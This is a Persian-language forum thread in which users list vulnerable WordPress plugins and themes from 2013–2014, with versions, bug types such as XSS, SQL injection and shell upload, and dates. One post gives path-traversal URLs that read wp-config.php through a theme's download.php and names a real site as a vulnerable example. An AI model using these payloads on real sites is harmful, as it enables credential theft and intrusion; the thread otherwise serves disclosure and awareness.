رفتن به مطلب

معرفی افزونه های دارای مشکل امنیتی


Black_Sky

پست های پیشنهاد شده

  • 3 هفته بعد...

رعایت نکردن نکته امنیتی wp easy backup

امشب خواستم این افزونه رو تست بزنم روی لوکال تستش کردم.

همانطور که میدونید به طور پیشفرض مسیر wp-content/uploads قابل مشاهده است.

سازنده این افزونه باید یک فایل index.html برای جلوگیری از مشاهده اون ایجاد میکرد

این افزونه یک فایل در این مسیر ایجاد میکنه به اسم dump.sql که تمام اطلاعات سایت شما در دست هکر قرار میگیره.

راستی یادم رفت تاکید کنم این فایل به راحتی قابل دانلوده

ویرایش شده توسط مرداویج
  • امتیاز 11
لینک به ارسال
  • 2 هفته بعد...

ام افزونه : Wordpress Download Manager Free & Pro

تاریخ:12-06-2013

لینک مخزن: http://downloads.wordpress.org/plugin/download-manager.zip

نویسنده: IT Nerdbox

باگ : XSS

-------------------------------------

پوسته : persuasion

آدرس شرکت سازنده :http://mysitemyway.com/theme/persuasion-wordpress-theme/

نسخه : 2.0 تا 2.3

نویسنده:Interference Security

تاریخ : 19 December 2013

  • امتیاز 6
لینک به ارسال

اینها یادم نبوده

اسم : WP-Cron Dashboard Wordpress plugin

نویسنده: OKAMOTO Wataru

نوع باگ: xss

تاریخ: December 5, 2013

نسخه:1.1.5

-----------------------------------------------------

اسم : Ad-minister Wordpress plugin

نویسنده: henrikmelin, kalstrom

نوع باگ: xss

تاریخ: December 5, 2013

نسخه:0.6

========================

اسم : Wordpress EEMP plugin

نویسنده:Cloudx

نوع باگ: SQL Injection

نسخه:All versions effected

==========================

  • امتیاز 8
لینک به ارسال
  • 2 هفته بعد...

نام افزونه :wp-e-commerce

نسخه: 3.8.9.5

نویسنده:KedAns-Dz

نوع :File Upload , Code Exec , File Include , Cross-Site Scripting , Object Inject

  • امتیاز 5
لینک به ارسال

نرم افزار آسیب پذیر:

افزونه All in One SEO Pack وردپرس

نوع آسیب پذیری:

XSS

نسخه آسیب پذیر:

1.3.6.4 - 1.6.15.2

تاریخ انتشار:

02-10-2013

راه حل:

به روزرسانی به نسخه 2.0.3.1

  • امتیاز 5
لینک به ارسال
  • 2 هفته بعد...

اسم:Wordpress Dandelion Themes

تاریخ:31/01/2014

نویسنده:TheBlackMonster

آدرس دانلود:http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628

  • امتیاز 6
لینک به ارسال
  • 3 هفته بعد...

این بخش مدتی بود نرسیده بودم:

افزونه معروف امنیتی :)

نام:WordPress Better WP Security

نسخه: 3.6.3

تاریخ:2014-02-15

--------------------------------------

نام:WordPress Buddypress

نسخه:1.9.1

تاریخ:2014-02-15

------------------------------------

نام:WordPress Acunetix WP Security Make Backup

تاریخ:2014-02-15

نسخه:4.0.3

  • امتیاز 8
لینک به ارسال

نام: EasyMedia Gallery

نسخه:1.2.29

نوع باگ:XSS

---

نام:hanks You Counter Button

نسخه:1.8.7

نوع باگ:XSS

---

نام:Media File Renamer

نسخه:1.70

نوع باگ:XSS

  • امتیاز 8
لینک به ارسال
  • 2 هفته بعد...

ممنون از دوست خوبمون.

نام : AdRotate

نسخه : 3.9.4

تاریخ انتشار : January 30, 2014

نوع باگ : SQL Injection

حالت : پچ شده.

  • امتیاز 5
لینک به ارسال
  • 2 هفته بعد...

نام:WordPress XCloner

نسخه:3.1.0

نوع حفره: Cross Site Request Forgery

تاریخ:2014-2340

  • امتیاز 3
لینک به ارسال
  • 2 ماه بعد...

اینم زحمت یکی از دوستان

نام:Wordpress Plugin Popup Images

تاریخ:2014-06-1

نوع باگ:Cross Site Scripting

نویسنده:Milad Hacking

نام:Wordpress Bonuspressx Plugin

تاریخ:2014-04-23

نوع باگ:Cross Site Scripting

نویسنده:Milad Hacking

  • امتیاز 3
لینک به ارسال
  • 3 هفته بعد...

شرمنده اما این حتما بخونید :

نام :Wordpress 3.9.1

نویسنده:Avinash Kumar Thapa

آدرس: localhost/wordpress/

  • امتیاز 5
لینک به ارسال

نام:ordpress gallery plugin

نویسنده:@u0x

تاریخ:June 24, 2014

===============

نام:WordPress image-symlinks Plugin Arbitrary File Upload Vulnerability

نویسندهbrunox

تاریخ:2014-06-24

  • امتیاز 3
لینک به ارسال
  • 3 هفته بعد...

نام افزونه و لینک منبع : BSK PDF Manager

نویسنده :Claudio Viviani

تاریخ:2014-07-11

نوع باگ :SQL Injection

پچ نشده است

  • امتیاز 5
لینک به ارسال
  • 2 هفته بعد...

2014-07-29 WordPress Slider Revolution Responsive 4.1.4 File Download Published

2014-07-29 WordPress FBGorilla SQL Injection Published

2014-07-29 WordPress Lead Octopus Power SQL Injection Published

2014-07-25 Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities Published

2014-07-25 WordPress Video Gallery 2.5 Cross Site Scripting / SQL Injection Published

2014-07-22 WordPress Gallery Objects 0.4 SQL Injection Published

2014-07-16 Wordpress WPTouch Authenticated File Upload Published

2014-07-15 WordPress Tidio Gallery 1.1 Shell Upload / XSS Published

2014-07-15 WordPress CopySafe PDF Protection 0.6 Shell Upload Published

2014-07-14 DZS Video Gallery for WordPress XSS, FPD and RCE vulnerabilities Published

2014-07-13 WordPress Download Manager 2.6.8 Shell Upload Published

2014-07-10 WordPress BSK PDF Manager 1.3.2 SQL Injection Published

2014-07-07 Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload Published

2014-07-07 WordPress NextGEN Gallery 2.0.63 Shell Upload Published

2014-07-02 Wordpress blogstand-smart-banner.1.0 Cross Site Scripting Published

2014-06-29 Wordpress wp-construction-mode.1.8 Cross Site Scripting Published

2014-06-29 Wordpress ml-slider 2.5 Cross Site Scripting Published

2014-06-28 Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities Published

  • امتیاز 4
لینک به ارسال
  • 2 هفته بعد...

2014-08-05 WordPress MyBand Theme Cross Site Scripting Published

2014-08-04 WordPress Gmedia Gallery 1.2.1 Shell Upload Published

2014-08-04 WordPress Gamespeed Theme Cross Site Scripting Published

2014-08-03 Wordpress SI CAPTCHA Anti-Spam Plugin Cross site scripting Published

2014-08-02 Wordpress Spider Video Player plugin Cross site scripting Published

  • امتیاز 1
لینک به ارسال

2014-08-08 WordPress WPSS 0.62 Cross Site Scripting Published

2014-08-08 WordPress 3.9.2 /xmlrpc.php poc Published

2014-08-08 WordPress WPSS 0.62 SQL Injection Publishe

  • امتیاز 1
لینک به ارسال
  • 2 ماه بعد...

نوع آسیب پذیری : Exploit

محل آسیب پذیری : تم و پلاگین های خاصی بطور مثال تم ypo-theme

تاریخ انتشار این آسیب پذیری: 25-09-2014

دستورات مورد استفاده:


http://[site]/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php
http://[site]/wp-content/themes/ypo-theme/download.php?filename=../../../../wp-config.php
http://[site]/wp-content/themes/ypo-theme/download.php?file=../../../../wp-config.php

نمونه سایت آسیب پذیر:

http://www.ifso.com/..../wp-config.php

لطفا به سایت نمونه آسیب نرسانید

منبعش هم به سایت خودم حمله شد متوجه این همه شدم ...

ویرایش شده توسط bestdata
  • امتیاز 1
لینک به ارسال
  • 2 ماه بعد...

انشالله تاپیک بیشتر بهش میرسم :

WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities

ecommerceMajor - SQL Injection And Authentication bypass

  • امتیاز 1
لینک به ارسال
  • Morteza unpinned this موضوع
مهمان
این موضوع برای عدم ارسال قفل گردیده است.
×
×
  • اضافه کردن...